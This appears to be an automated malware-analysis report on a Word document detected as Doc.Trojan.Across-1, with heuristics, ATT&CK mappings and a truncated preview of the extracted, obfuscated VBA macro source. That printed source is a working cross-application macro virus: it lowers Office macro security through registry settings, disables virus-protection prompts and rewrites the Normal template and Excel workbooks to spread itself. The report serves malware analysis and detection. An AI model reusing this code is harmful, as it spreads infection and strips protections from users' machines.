MALICIOUS
280
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample contains VBA macros that attempt to disable macro security by modifying registry keys related to Office security settings. It also attempts to inject code into the Normal template, likely to establish persistence. The ClamAV detection 'Doc.Trojan.Across-1' further supports its malicious nature.
Heuristics 5
-
ClamAV: Doc.Trojan.Across-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Across-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 27921 bytes |
SHA-256: ce2ec774a495e3a6052cfb3f01f133a4466c23003f561aac0228b0943a3d9d1a |
|||
|
Detection
ClamAV:
Doc.Trojan.Across-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Cross.Angel
Private Sub Document_Close()
On Error Resume Next
Const ˆ»¾™Š = "' Cross.Angel", •Ǥ Ÿ = 132, µÈÇŠ¿ = "9.0", À©¸Ë¬ = "Macro", ˶ž½œ = "Tools", ¯¹®§ = &H1, ¯¹®§_ = &H0, ¯¶˜™² = 0, ¢Â¶¥• = 1, »…¨�Ž = 12, µ—Ê·¦ = "excel.application", ¼Æ±¬• = "DieseArbeitsmappe"
Application.EnableCancelKey = (Rnd * ¯¶˜™²)
If Application.Version = µÈÇŠ¿ Then
Application.CommandBars(À©¸Ë¬).Controls((¢Â¶¥• + ¢Â¶¥• + ¢Â¶¥•)).Enabled = (Rnd * ¯¶˜™²)
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = ¯¹®§
Else
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ¯¹®§_
Application.CommandBars(˶ž½œ).Controls(»…¨�Ž).Enabled = (Rnd * ¯¶˜™²)
Options.VirusProtection = (Rnd * ¯¶˜™²)
End If
Options.SaveNormalPrompt = (Rnd * ¯¶˜™²)
’¸„„„ = ‚–˜¤�(ThisDocument.VBProject.VBComponents(¢Â¶¥•).CodeModule.Lines(¢Â¶¥•, •Ǥ Ÿ))
If MacroContainer = ActiveDocument Then Set µˆ˜ˆŸ = NormalTemplate Else Set µˆ˜ˆŸ = ActiveDocument
With µˆ˜ˆŸ.VBProject.VBComponents(¢Â¶¥•).CodeModule
If .Lines(¢Â¶¥•, ¢Â¶¥•) <> ˆ»¾™Š Then
.DeleteLines ¢Â¶¥•, .CountOfLines
.InsertLines ¢Â¶¥•, ’¸„„„
If µˆ˜ˆŸ = ActiveDocument Then ActiveDocument.SaveAs ActiveDocument.FullName
End If
End With
If System.PrivateProfileString("c:\.ini", "Carinthia", "Excel") <> ¢Â¶¥• Then
Set ´°ƒˆ� = GetObject(, µ—Ê·¦)
If ´°ƒˆ� = "" Then Set ´°ƒˆ� = CreateObject(µ—Ê·¦): ª±›¤Ã = ¢Â¶¥•
If ª±›¤Ã <> ¢Â¶¥• Then
For Each †�„–À In ´°ƒˆ�.Workbooks
With †�„–À.VBProject.VBComponents(¼Æ±¬•).CodeModule
If .Lines(¢Â¶¥•, ¢Â¶¥•) <> ˆ»¾™Š Then
.DeleteLines ¢Â¶¥•, .CountOfLines
.InsertLines ¢Â¶¥•, ’¸„„„
If †�„–À.Path <> "" Then †�„–À.Save Else †�„–À.SaveAs †�„–À.FullName
End If
End With
Next
Else
For †�„–À = ¢Â¶¥• To ´°ƒˆ�.Application.RecentFiles.Maximum
´°ƒˆ�.Application.RecentFiles(†�„–À).Open
With ´°ƒˆ�.Application.Workbooks(Application.RecentFiles(1).Name).VBProject.VBComponents(¼Æ±¬•).CodeModule
If .Lines(¢Â¶¥•, ¢Â¶¥•) <> ˆ»¾™Š Then
.DeleteLines ¢Â¶¥•, .CountOfLines
.InsertLines ¢Â¶¥•, ’¸„„„
End If
End With
´°ƒˆ�.Application.Workbooks(Application.RecentFiles(1).Name).Close ¢Â¶¥•
Next
´°ƒˆ�.Quit
End If
System.PrivateProfileString("c:\.ini", "Carinthia", "Excel") = ¢Â¶¥•
End If
If Minute(Now()) = Int(Rnd * 60) + 1 Then MsgBox "Why I lost my angel? Can't live without you!", vbQuestion, "Cross.Angel by jackie-/Lz0NT/MVT"
If System.PrivateProfileString("c:\.ini", "Carinthia", "Word") <> ¢Â¶¥• Then System.PrivateProfileString("c:\.ini", "Carinthia", "Word") = ¢Â¶¥•
End Sub
Private Sub Workbook_Deactivate()
On Error Resume Next
Const ˆ»¾™Š = "' Cross.Angel", •Ǥ Ÿ = 132, µÈÇŠ¿ = "9.0", À©¸Ë¬ = "Macro", ˶ž½œ = "Tools", ¯¶˜™² = 0, ¢Â¶¥• = 1, »…¨�Ž = 10, µ—Ê·¦ = "word.application", ¼Æ±¬• = "DieseArbeitsmappe"
Application.EnableCancelKey = (Rnd * ¯¶˜™²)
If UCase(Dir("c:\.reg")) <> ".REG" Then
Open "c:\.reg" For Output As #1
Print #1, "REGEDIT4"
If Application.Version = µÈÇŠ¿ Then
Application.CommandBars(À©¸Ë¬).Controls((¢Â¶¥• + ¢Â¶¥• + ¢Â¶¥•)).Enabled = (Rnd * ¯¶˜™²)
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security]"
Print #1, """Level""=dword:00000001"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]"
Print #1, """Level""=dword:00000001"
Else
Application.CommandBars(˶ž½œ).Controls(»…¨�Ž).Enabled = (Rnd * ¯¶˜™²)
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel]"
Print #1, """Options6""=dword:00000000
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.